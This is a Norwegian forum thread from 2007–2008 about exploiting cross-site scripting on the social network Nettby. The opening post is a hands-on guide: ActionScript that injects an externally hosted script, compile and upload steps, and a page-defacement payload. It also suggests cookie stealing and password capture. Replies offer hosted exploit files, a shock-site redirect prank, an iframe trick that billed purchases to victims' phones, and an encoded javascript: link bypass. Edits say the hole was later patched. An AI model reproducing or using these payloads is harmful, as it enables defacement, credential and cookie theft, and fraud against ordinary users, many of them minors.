Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  47 15007
[COLOR=Red]Dyret er lei av PMer om dette emnet, og vil minne om at det faktisk ikkje fungerer lenger. Dyret ber derfor om at folk leser tråden, dette, tenker, finner ut at det ikkje funer, istadenfor å sende PM.[/COLOR]

Siden det å prøve å komme gjennom til Nettby-ledelsen med dette har vist seg umulig, ser jeg meg nødt til å dele dette med alle - i håp om at noe blir gjort før de krimineller tar over.

De som bruker Nettby har sikkert fått med seg at det er mulig å "pimpe" profilen din ved å legge til en kryptisk flash-fil generert av http://pimp.thurmann.net. Denne flash-filen inkluderer rett og slett JavaScriptkode, som igjen inkluderer en ekstern fil med enda mer kode. Resultatet er at HTML-koden blir endret når personer besøker profilen din, uten at den som besøker trykker på noe som helst.

Dette er en av de snille mulighetene.

Med tilgang til å legge inn egen JavaScript-kode kan en med profil på Nettby f.eks. redirekte personer til en annen side, fikse på innholdet slik at brukeren tror han eller hun er utlogget (og snappe passordet når de "logger på igjen"), stjele cookies, og alt dette uten at brukeren skjønner noe som helst. Altså et relativt stort sikkerhetshull.


Men til hovedsaken, hvordan kan DU gjøre dette? Du trenger følgende:
- Motion-Twin Compiler (Command-line verktøy for å kompilere ActionScript)
- Et domene med et par kilobyte lagringsplass
- Minimal forståelse av enten JavaScript & HTML, innen bruk av Google, eller copy-pasting av tråder.

Pakk ut Motion-Twin og opprett en fil kalt f.eks. xss.as i samme mappe, som ser slik ut:

Fjern mellomrom der du ser at de er generert feil pga code-boksen, dvs. i "(' head')", "js.setA ttribute" og "(js )".

[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]

Kode

class Xss {

	static var app : Xss;

	function Xss() {
	}

	static function main(mc) {
		
		getURL("javascript:function include_dom(script_filename){var html_doc=document.getElementsByTagName('head').item(0);var js = document.createElement('script');js.setAttribute('language', 'javascript');js.setAttribute('type', 'text/javascript');js.setAttribute('src', script_filename);html_doc.appendChild(js);} include_dom('http://path/to/external/xss.js');");
	}
}
Bytt ut URL'en helt til slutt med din egen, og kompiler med
mtasc -swf xss.swf -main xss.as -header 1:1:30

Trikset her er at getURL blir skrevet direkte i klientens adressefelt, så der kan du skrive hva enn du vil - det seg være en ren redirect til en annen URL, eller javascript:alert('BAM!'); Prøv å unngå å bruke anførselstegn i koden, siden escaping med nøstede kommandoer slik ikke alltid kompilerer riktig.

I filen xss.js kan du skrive omtrent hva som helst av JavaScript-kode, og er lettere å gjøre raske endringer på enn å hardkode dem inn i en flash-fil hver eneste gang. Et eksempel på en slik scriptfil har jeg inkludert under, og den legger inn din egen html oppå den gamle for å gi et nytt utseende (også kalt defacing).

[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]

Kode

var title = "NETTBY ER IKKE SIKKERT!";
var bgcolor = "#000000";
var image_url = "http://www.localarcade.com/arcade_art/data/thumbnails/9/Homer_Simpson_Sideart_Homebrew.jpg";
var text = "Nå kunne jeg ha sittet med din sensitive informasjon, eller lurt deg til å logge inn på nytt og tatt passordet ditt. Hjelp til med å varsle byvakter og si at flash-innhold må forbys i profiler!";
var font_color = "#FF0000";

deface(title, bgcolor, image_url, text, font_color);
 
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
  document.title = pageTitle;
  document.body.innerHTML = '';
  document.bgColor = bgColor;
  var overLay = document.createElement("div");
  overLay.style.textAlign = 'center';
  document.body.appendChild(overLay);
  var txt = document.createElement("p");
  txt.style.font = 'normal normal bold 36px Verdana';
  txt.style.color = fontColor;
  txt.innerHTML = pageText;
  overLay.appendChild(txt);
 
  if (image_url != "") {
    var newImg = document.createElement("img");
    newImg.setAttribute("border", '0');
    newImg.setAttribute("src", imageUrl);
    overLay.appendChild(newImg);
  }

  var footer = document.createElement("p");
  footer.style.font = 'italic normal normal 12px Arial';
  footer.style.color = '#DDDDDD';
  footer.innerHTML = title;
  overLay.appendChild(footer);

}
Koden inkluderer en del style-tags bare for å vise hvordan det faktisk kan gjøres. For de som føler seg litt ondere, er en cookie-stealer temmelig lett å implementere her også. Dette er bare én av uendelig mange muligheter, så det føler jeg ikke er nødvendig å dekke her.

Etter du har gjort dette gjenstår det et par trinn:
1. Last opp xss.js og xss.swf til et domene du har tilgang til, fortrinnsvis til samme URL som i xss.as
2. Gå til Nettby.
3. Trykk på "Endre profil" i menyen til høyre.
4. Trykk på knappen helt øverst til høyre i verktøy-boksen du har (Insert / edit embedded media).
5. Velg Type = Flash og Dimensions = 1x1 FØRST.
6. Skriv inn full URL til xss.swf og trykk "Sett inn" uten å trykke på noen andre felt.

Boksen vil prøve å forhåndsvise, og dermed kjøre koden din hvis du trykker på et annet felt. Dette ønsker du ikke, så vent med å taste URL helt til slutt.

Når noen nå besøker profilen din vil de se f.eks. noe sånt som dette:

https://imma.gr/2564


Til slutt vil jeg si at dette er NØYAKTIG samme konsept som "Pimp My Profile" bruker, og så lenge dét har lov å endre html-kode og utseende vil jeg hevde at alle har lov å gjøre det. Jeg oppfordrer ikke til bruk av ondsinnet kode, men det er ikke til å stikke under en stol at det er veldig mulig å utføre for de som kan.

[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]
Sist endret av vidarlo; 31. august 2008 kl. 00:16.
Hehhehe.... selv om jeg ikke bruker nettby, var dette nesten grunn god nok til å regge meg en konto!

"Byvakter" ?

Sitat av UngarEffect
Er nettbys svar på admins. Nesten det samme som om de skulle kalt seg "Freakpassere" her.
Vis hele sitatet...
Hahhahaha... "Freakpassere" skulle tatt seg ut, ja..

Men herregud så døllt... hvorfor ikke bare si "Vekter" ?
Sist endret av Turbolego; 9. desember 2007 kl. 22:25.
Trigonoceps occipita
vidarlo's Avatar
Donor
Holy fuck.

Det verste er at resultatet nok blir utestenging av dei som bruker det, og bare holde kjeft om hullet så lenge som mulig. VG tjener fett på nettby tipper eg, og det er ingen grunn til at dei skal kutte profitten med 500,- slik at hullet kan bli fiksa...

Dessutan er jo flash et FEATURE!!!!!!!! Korleis skal ellers 14 år gamle jenter få flashy thingies i profilen sin?

Så eg forventer fornekting Prove me wrong, VG!
hehe genialt... vedder på at det blir sletta av admins, men tviler på at de fikser sikkerhetshullet før MANGE legger til slike filer i profilen sin...
Sitat av cedd
hehe genialt... vedder på at det blir sletta av admins, men tviler på at de fikser sikkerhetshullet før MANGE legger til slike filer i profilen sin...
Vis hele sitatet...
Let the flame begin...
Sitat av cedd
hehe genialt... vedder på at det blir sletta av admins, men tviler på at de fikser sikkerhetshullet før MANGE legger til slike filer i profilen sin...
Vis hele sitatet...
Tingen er at å fikse dette hullet vil tilsvare å sette allowscriptaccess=”never”, og da ryker muligheten for "Pimp my Profile". Da blir det mange triste trutemunner rundt i Norges land
Sitat av Turbolego
Hehhehe.... selv om jeg ikke bruker nettby, var dette nesten grunn god nok til å regge meg en konto!

"Byvakter" ?
Vis hele sitatet...
Er nettbys svar på admins. Nesten det samme som om de skulle kalt seg "Freakpassere" her.
Vel, er det mulig at noen her hoster det?

Jeg er altfor lat til å gidde å hoste noe nå.
From the creators of Nettbyll comes... MAKE YOUR OWN NETTBY-VIRUS!

Da Dyret og jeg laga Nettbyll testa vi ut Nettbys sikkerhet rundt kjeks. Når man logger inn på Nettby, logges både IP og kjeks; så om man prøver å logge inn med kjeks alene, sjekkes IP mot forrige innloggede IP. Så å stjele andres kjeks er desverre unyttig.

Men man kan ha det masse moro med denne sploiten.

Følgende kombo anbefales:

1. Pimp profilen din med javascript som redirecter til "Two Girls and one Cup" eller lignende.
2. Bruk nettbyll slik at veldig mange folk besøker profilen din.
3. PROFIT.
Sist endret av dexter; 10. desember 2007 kl. 08:03.
Åh, du dexter du dexter..
Du er håpløs.. Men alikevel genial!

Jeg tror jeg skal prøve med redirect i dag. Så, skal vi se hva som skjer.

Foresten, står det noe i "nettby lovene" om at det ikke er lov å redirecte?
Sitat av OoM
Åh, du dexter du dexter..
Du er håpløs.. Men alikevel genial!

Jeg tror jeg skal prøve med redirect i dag. Så, skal vi se hva som skjer.
Vis hele sitatet...
Dexter er gud.

Sitat av OoM
Foresten, står det noe i "nettby lovene" om at det ikke er lov å redirecte?
Vis hele sitatet...
Det går vel gjerne under følgende regler:
§1 [...] Vi godtar ikke innhold som kan medføre straffeansvar, er ærekrenkende, rasistisk, truende, obskønt, pornografisk eller på annen måte er i strid med norsk lov. [...]
§6 Teknisk misbruk av systemet kan føre til utestengelse.
Vis hele sitatet...
Jeg la opp noen eksempelfiler til inkludering for de som ikke får til/gidder selv.
Begynn på steg 2 og velg en av disse som adresse til flash-filen:
http://nettbyll.net/js/xss.swf
http://nettbyll.net/js/fun.swf

xss.swf inkluderer filen xss.js (i samme mappe), som defacer profilsiden din med eget innhold.
fun.swf har en litt morsom kode, hardkodet i selve flashfilen, som får alle bildene på siden til å gå helt karusell
Kom i kontakt med en av utviklerne nå, og han fikset exploiten på et par minutter. Når en profil blir oppdatert fra nå av vil alle embed-URL'er sjekkes opp mot et filter før de legges til. Fortsatt ikke helt perfekt, men så helt klart mye tryggere.
Det fins andre måter å få kjørt javascript kode uten bruk av flash, men jeg tror jeg holder dem for meg selv.

Jeg spår en xss orm i nærmeste framtid, mark my words.
Sist endret av mogroto; 16. desember 2007 kl. 21:04.
z0p
uʍop ǝpısdn
z0p's Avatar
Etter mine formeninger vil det da relativt enkelt la seg gjøre å lage en ganske effektiv javascript-orm
Sitat av mogroto
Det fins andre måter å få kjørt javascript kode uten bruk av flash, men jeg tror jeg holder dem for meg selv.

Jeg spår en xss orm i nærmeste framtid, mark my words.
Vis hele sitatet...
Nei, del dine hemmeligheter med oss!
▼ ... over en måned senere ... ▼
Argh, det funker i preveiw, men når jeg legger det ut på profilen funker det ikke =( har de retta det opp?
▼ ... noen uker senere ... ▼
Fikset dette? Bare "Pimp min profil" fungerer på allowscriptaccess="always"


Edit:
Sitat av Dyret
Kom i kontakt med en av utviklerne nå, og han fikset exploiten på et par minutter. Når en profil blir oppdatert fra nå av vil alle embed-URL'er sjekkes opp mot et filter før de legges til. Fortsatt ikke helt perfekt, men så helt klart mye tryggere.
Vis hele sitatet...
Oooh..
Sist endret av esl; 20. februar 2008 kl. 10:28.
Jeg må spørre:

Det forslaget du hadde, at vi begynner med STEG 2, hvor blir passordet sendt da ? Til deg ?
Sist endret av idiotkrati; 20. februar 2008 kl. 11:25.
men hvem bruker nettby lenger da? lol
Sist endret av Dvergen; 20. februar 2008 kl. 17:43.
Sitat av idiotkrati
Jeg må spørre:

Det forslaget du hadde, at vi begynner med STEG 2, hvor blir passordet sendt da ? Til deg ?
Vis hele sitatet...
Det kommer da an på din egen kode forsåvidt. Selv om jeg forklarte hvordan ting kan gjøres så betyr ikke det at din kode automagisk vil ha noe med meg å gjøre.
Sitat av mogroto
Det fins andre måter å få kjørt javascript kode uten bruk av flash, men jeg tror jeg holder dem for meg selv.

Jeg spår en xss orm i nærmeste framtid, mark my words.
Vis hele sitatet...
Spar oss.
Det finnes måter å late som man vet noe, uten å oppgi kilder/info e.l også.
Jeg ville holde den for meg selv, men du avslørte det.

Sitat av Dvergen
men hvem bruker nettby lenger da? lol
Vis hele sitatet...
Jeg orker ikke navngi alle.
Men nå er klokken 04:10 og det er over 3000 pålogget. Så jeg vil tippe 10-15.000 besøkende daglig. Alder?
- Allt fra 8 - 70 år ca.
Sist endret av Mcmak; 22. februar 2008 kl. 04:12.
Ordenens Seglbevarer
Ond^Sofa's Avatar
Sitat av Mcmak
Spar oss.
Det finnes måter å late som man vet noe, uten å oppgi kilder/info e.l også.
Jeg ville holde den for meg selv, men du avslørte det.



Jeg orker ikke navngi alle.
Men nå er klokken 04:10 og det er over 3000 pålogget. Så jeg vil tippe 10-15.000 besøkende daglig. Alder?
- Allt fra 8 - 70 år ca.
Vis hele sitatet...
Der tar du desverre feil.

På det meste, er det 40 000 pålogget. Samtidig.
▼ ... over en måned senere ... ▼
Hmm... Klar over at jeg "bumper" denne tråden, men trenger en smule hjelp.
Lastet opp alt, og gjort som guiden sier, men når jeg går på min profil, skjer det ingenting!
På den "preview"-greia i embet greia, så viser den Homer Simpson bildet, men ingenting i selve profilen min. Hva kan gjøres?
Sitat av Maol33t
Hmm... Klar over at jeg "bumper" denne tråden, men trenger en smule hjelp.
Lastet opp alt, og gjort som guiden sier, men når jeg går på min profil, skjer det ingenting!
På den "preview"-greia i embet greia, så viser den Homer Simpson bildet, men ingenting i selve profilen min. Hva kan gjøres?
Vis hele sitatet...
Hvis du leser litt tilbake i tråden så er dette nå "fikset". Hver gang du legger til embedded media vil dette sjekkes opp mot en whitelist slik at f.eks. Youtube og pimp-my-profile blir godkjent, mens alt annet blir fjernet. Hvis du prøver litt så kan det hende du finner en måte å smette inn din egen side likevel for alt jeg vet
Sitat av Dyret
Hvis du leser litt tilbake i tråden så er dette nå "fikset". Hver gang du legger til embedded media vil dette sjekkes opp mot en whitelist slik at f.eks. Youtube og pimp-my-profile blir godkjent, mens alt annet blir fjernet. Hvis du prøver litt så kan det hende du finner en måte å smette inn din egen side likevel for alt jeg vet
Vis hele sitatet...
Hmm... Ja, da så =)! Får prøve på noe nytt da.
For ikke lenge siden hadde Nettby også et sikkerhetshull som gjorde at du kunne legge en lenke på profilen din; "TØR DU TRYKKE HER?!", og lenke den til en side kjøpte mange 100 Nettby MAX til den som hadde lenken på profilen.

1. Lenke med tekst
2. Lenken fører til en side som refresher seg selv hele tiden (0 sek ref), samt kjører IFRAME på http://nettby.no/user/kjopnettbymax.php.

Mao; Den som trykket på lenken kjøpte mange Nettby MAX til eieren av lenken/siden. Ubegrenset antall, frem til vedkommende slår av maskinen sin.
Queen of Blades
Jonta's Avatar
DonorCrew
Jeg som allerede hadde gledet meg til å tipse dagbladet om denne tråden. *sukk*
Sitat av Freak
For ikke lenge siden hadde Nettby også et sikkerhetshull som gjorde at du kunne legge en lenke på profilen din; "TØR DU TRYKKE HER?!", og lenke den til en side kjøpte mange 100 Nettby MAX til den som hadde lenken på profilen.

1. Lenke med tekst
2. Lenken fører til en side som refresher seg selv hele tiden (0 sek ref), samt kjører IFRAME på http://nettby.no/user/kjopnettbymax.php.

Mao; Den som trykket på lenken kjøpte mange Nettby MAX til eieren av lenken/siden. Ubegrenset antall, frem til vedkommende slår av maskinen sin.
Vis hele sitatet...
Hvordan fungerte det? Du kan ikke bare gå innpå en side, så kjøper du automatisk nettbymax på adsl regninga så..
Hvis jeg husker rett, har du oppgitt tlf. nummeret ditt når du registrerer deg på nettby og da går regninga til telefoneieren
Ja, det blir belastet mobiltelefonen din. Fikk Nettby MAX i mange måneder jeg
▼ ... noen måneder senere ... ▼
ossen virker koder egentlig?
▼ ... noen uker senere ... ▼
Sitat av HerBackleS
Vis hele sitatet...
*Sukk*

Les alt mellom <!-- begin profile --> og en lignende tag for slutt i source. Renspikka HTML med innslag av CSS. Hvis du ikke skjønner noe av det som står inni der har du dårlige muligheter til å få til noe lignende selv, så les deg opp på W3schools e.l.
Noen som vet hvorfor jeg ikke får MTASC til å funke i Vista? Når jeg åpner det men det forsvinner igjen med en gang.
▼ ... noen uker senere ... ▼
samfunnsukritisk
JunkieXL's Avatar
Fett, men nettby tillater vel ikke JS lenger
Bedre å bruke CSS nå!:P
Sitat av Dyret
*Sukk*

Les alt mellom <!-- begin profile --> og en lignende tag for slutt i source. Renspikka HTML med innslag av CSS. Hvis du ikke skjønner noe av det som står inni der har du dårlige muligheter til å få til noe lignende selv, så les deg opp på W3schools e.l.
Vis hele sitatet...
Jeg prøvde på dette selv, men i sourcekoden til den brukeren står "td {display: none}".
Setter jeg den i min kode, forsvinner alt unntatt nettbylogoen og menyen under.
Hvordan får jeg fjernet alt, unntatt logoen, topp menyen og min profiltekst?
Når du setter "td {display: none}", så fjerner du alt som er satt inn i celler(noe nettby har gjort). du må da pakke alt inn i div, p, etc.

Etter å ha satt "td {display: none;}, så er det bare å fyre løs med å bygge opp profilen din.

2+1 delt profil,

HTML-kode

<br /></td><style>#topbanner{display:none; }td {display: none}#wrapp{}#about {background-color:#000000; width: 600px; height: 240px; float: left; border: medium dotted rgb(250,0,0); }#flash {background-color:#000000; width: 388px; height: 240px; float: right; border: medium dotted rgb(250,0,0); }#other{background-color:#000000; height:640px; border: medium dotted rgb(250,0,0); }body {background-color:#000000; margin-left: auto; margin-right: auto; width: 0px; }p{color: blue; }</style>
<div id="wrapp">
		<div id="about">
			<p align="center">
			<Sett inn<br />noe tekst<br />som inneholder<br />litt om deg
			<p/>
		</div>
		
		<div id="flash">
			<p align="center">
			Sett inn<br />en fancy<br />flash applicasjon<br />som du har<br />lyst på her
			</p>
		</div>

		<div id="other">
			<p align="center">
			Sett inn<br />mye annet<br />du vil ha her<br /> som for eksempel<br />Youtube videoer,<br />bilder,<br />eller annet
			</p>
		<div/>
	<div/>
La rammer rundt områdene slik at du lettere kan se dem. Nå er det bare å legge inn det du ønsker.

Jeg for min del la inn Last.fm radioen.
Min profil
Sist endret av Unicron2k; 31. august 2008 kl. 01:57.
Sitat av Shadow Reaper

Jeg for min del la inn Last.fm radioen.
Min profil
Vis hele sitatet...
Oh my god, what are the ods! Servern jeg har stående bak meg her heter Unicron.. :P
Sitat av dosky
Vis hele sitatet...
Jeg prøvde koden din i min profil (jeg skal ikke ha den der, men var bare spent på å se om den funket).
Alt så bra ut på "Rediger profil"-siden, men da jeg lagret koden og så på siden min, kom bare halvparten av det som var på siden din opp!
Man ser bare "Lightstorm" logoen, ikke bildet av deg for eksempel.
Hvorfor er det slik?
Sitat av dosky
Vis hele sitatet...
Pent! Får min profil til å se ut som et fyllekjørt søppelverk :P
btw. så elsker jeg musikken din

får vel ta et skippertak når jeg orker, og lage meg en orntlig profil en dag hvis jeg skal ha en fancy profil(du har hevet standaren!)


Sitat av fiNk
Oh my god, what are the ods! Servern jeg har stående bak meg her heter Unicron.. :P
Vis hele sitatet...
umm...Hæ? :P
Har brukt Unicron ganske lenge nå(regga meg på FF.nu før jeg skifta til Unicron. Regner med at det nicket vil bli permanent).
Sitat av Maol33t
Jeg prøvde koden din i min profil (jeg skal ikke ha den der, men var bare spent på å se om den funket).
Alt så bra ut på "Rediger profil"-siden, men da jeg lagret koden og så på siden min, kom bare halvparten av det som var på siden din opp!
Man ser bare "Lightstorm" logoen, ikke bildet av deg for eksempel.
Hvorfor er det slik?
Vis hele sitatet...
Tror det er fordi at innholdet i koden kun vises i den delen av profilen hvor bruker kan skrive ting vanligvis, ikke i de områdene hvor menyene og profilbildene normalt sett ligger. Prøvde dette selv, og har ingen ide om hvordan Lightstorm fikk til å bruke hele websiden til å vise profilen sin. Er nysgjerrig på hva trikset er jeg også
Slå av javascript i browser før du klikker rediger profil..

For Firefox:
Verktøy - Innstillinger - Innhold - Tillat javascript [fjern avmerking]
▼ ... noen måneder senere ... ▼
Jeg trodde Nettby skulle være effektive når det gjaldt å tette sikkerhetshull, noe de ikke er. Derfor er det ofte at ting som dette må lekke før det blir gjort noe. Uansett, trodde du at det var helt umulig å bruke javascript på profilen din, iallefall etter det forrige XSS angrepet? Det er mulig, men det er begrenset på hvilken måte man kan bruke javascriptet.

Det eneste du trenger er å kryptere koden din. Krypteringen er med UTF-8 Unicode, men en Long-versjon, samt at vi enkelt og greit fjerner semikolon som er med

Slik vil koden se ut uten kryptering:

Kode

javascript:alert('Nettby')
Slik vil koden se ut med vanlig UTF-8 Unicode-kryptering (fungerer ikke):

Kode

javascript:alert('Nettby'&#41
Slik vil koden se ut med Long UTF-8 Unicode-kryptering, der semikolon er fjernet (som fungerer å bruke på nettby):

Kode

&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000078&#0000101&#0000116&#0000116&#0000098&#0000121&#0000039&#0000041
For å få koden til å fungere, lager vi en link av den:

Kode

<a href="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000078&#0000101&#0000116&#0000116&#0000098&#0000121&#0000039&#0000041">Nettby</a>
Dette krever at folk trykker på en link for at javascriptet aktiveres, men når man tenker seg om, så er der utrolig mange som klikker på linker uten å sjekke hva linken fører til.. Kopier den siste koden og lim den inn i profilen din, så ser du at det virker som det skal

PS: Koden ble lekket for å få fart på å fikse hull i nettby, noe de tydeligvis ikke prioriterer. Når de får press på seg er det en helt annen sak. Det er ikke ment at dette hullet skal utnyttes på andre måter enn å bekrefte at det finnes et hull som ikke er tettet.
▼ ... over en måned senere ... ▼
Ser at nettby har fikset det med html og css i profilen, noe som irriterer meg grenseløst, noen som har funnet et nytt sikkerhetshull?